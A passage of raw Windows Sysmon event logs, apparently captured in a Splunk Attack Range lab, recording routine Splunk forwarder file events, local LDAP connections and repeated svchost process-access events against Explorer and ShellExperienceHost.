Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:05.727{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D199231865D37E0460168B61918DDFF0,SHA256=58DBD55DEB00207BE2EBAB0126C327A9AD6FFFB85008ADCA6A05ADE31D89E667,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:05.300{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6E22795ED7597D61A594A59EC9B382D,SHA256=611666420F176962DE3E3C6DCDEC979B17C187ABF6256EACBB0B710690DA83DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.153{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53309-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.153{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53309-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:06.727{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F0F561FD16D0C39F1C4BBA1AFC8E14A,SHA256=FE5162B9F5A136670DFCE360CF8F804535F30668EE9775F2F8DCD344C6F80A91,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:04.676{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51237-false10.0.1.12-8000- 23542300x8000000000000000215157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:06.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED16281B4303A2646FDAC907BFAD1C7,SHA256=B9A884D762353E713847265666843669B5EB1824CB5BB510D5BC17110C3A1E5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:07.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=298C28C20664895ACC2D56AC3B08358F,SHA256=B3E6CC7FB9C5A67E4C0A4C29FF258AFC5965F809446421B3F0322305962B64A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.586{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:08.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 